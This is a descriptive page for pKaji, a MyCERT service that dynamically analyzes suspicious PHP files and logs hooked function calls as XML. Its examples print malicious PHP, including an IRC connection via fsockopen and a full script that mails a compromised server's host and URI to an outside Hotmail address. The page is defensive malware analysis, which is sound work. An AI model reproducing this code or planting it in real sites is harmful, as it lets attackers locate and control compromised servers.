pKaji is a service that analyzes suspicious php code files and facilitates the quick
detection of network activities and all kinds of malicous code using hooking technique.

Brought to you by               

About pKaji

pKaji is a free service provided by MyCERT which analyzes suspicious PHP code files and facilitates quick detection of network activities and all kinds of malicious code using the hooking technique. It uses APD (Advance PHP Debugger) extension to hook the original PHP built-in function.

Using pKaji

To use pKaji, a user can upload a valid PHP file to pKaji with a size smaller than 1 Mb at https://blog.honeynet.org.my/pKaji/. The front-end of pKaji will forward the request to the pKaji-core engine. The process will probably take a few minutes depending on the server workload.

Result of the analysis will be in shown in xml format displaying each of the parameter sent to the function called.

Output Example

PHP codeXML Output
set_time_limit(0); <function_call>
    <name>set_time_limit</name>
    <parameter>seconds=0</parameter>
</function_call>
fsockopen(“irc.neoshell.org”,”6667”, &$err_num, &$err_msg, 30); <function_call>
    <name>fsockopen</name>
    <parameter>host=irc.neoshell.org, port=6667, , , 30</parameter>
</function_call>
echo "ID: ShiroHige<br>"; <function_call>
    <name>echo</name>
    <parameter>$str="ID: ShiroHige<br>"</parameter>
</function_call>
@getenv("SERVER_ADDR"); <function_call>
    <name>getenv</name>
    <parameter>$varname=SERVER_ADDR</parameter>
</function_call>

Sample Analysis

Input File:
<?php //=================================
//
// scan inb0x hotmail v1.0
//
//
// priv8 file
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "te-adoro";
$email1 = "c0d3zinhu@hotmail.com";
$headers = "From: \r\n";
if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "Opa, enviado!"; exit();
} else{
echo "Não enviei.."; exit();
} ?>

XML Output
<pkaji>
    <file_name>7869801b2e71993b9696e2b498f6f750.php</file_name>
    <function_call>
        <name>ini_set</name>
        <parameter>$varname=max_execution_time, $newvalue=-1</parameter>
    </function_call>
    <function_call>
        <name>set_time_limit</name>
        <parameter>seconds=0</parameter>
    </function_call>
    <function_call>
        <name>get_current_user</name>
        <parameter></parameter>
    </function_call>
    <function_call>
        <name>mail</name>
        <parameter>$to='c0d3zinhu@hotmail.com' ,$subject='te-adoro' , $message='' , $additional_headers='From: ' , $additional_parameters='' </parameter>
    </function_call>
    <function_call>
        <name>echo</name>
        <parameter>$str="N�o enviei.."</parameter>
    </function_call>
</pkaji>


IRC Channel

#pkaji on freenode